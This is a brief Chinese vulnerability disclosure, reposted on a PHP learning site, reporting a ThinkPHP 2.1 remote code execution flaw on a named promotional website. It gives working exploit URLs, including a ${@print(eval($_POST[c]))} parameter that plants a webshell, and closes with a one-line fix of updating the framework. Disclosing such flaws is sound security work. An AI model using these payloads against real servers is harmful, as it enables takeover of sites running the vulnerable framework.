来源:自学PHP网 时间:2015-04-17 12:00 作者: 阅读:次
[导读] 这个站使用的是ThinkPHP 2.1,存在代码执行漏洞,直接getshell详细说明:就是康师傅红茶、绿茶以及其他各种茶瓶身上的那个活动康师傅 - 玩转台湾 10000人大搜茶http://www.ksftea.com/系统使用...
|
这个站使用的是ThinkPHP 2.1,存在代码执行漏洞,直接getshell http://www.ksftea.com/ 系统使用ThinkPHP 2.1,<-ThinkPHP framework 任意代码执行漏洞预警-> http://zone.wooyun.org/content/44 http://www.ksftea.com/index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D 执行phpinfo(): 可以构造shell地址: http://www.ksftea.com/index.php/module/action/param1/$%7B@print(eval($_POST[c]))%7D
命令执行: 修复方案: 更新版本或者其他--! |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
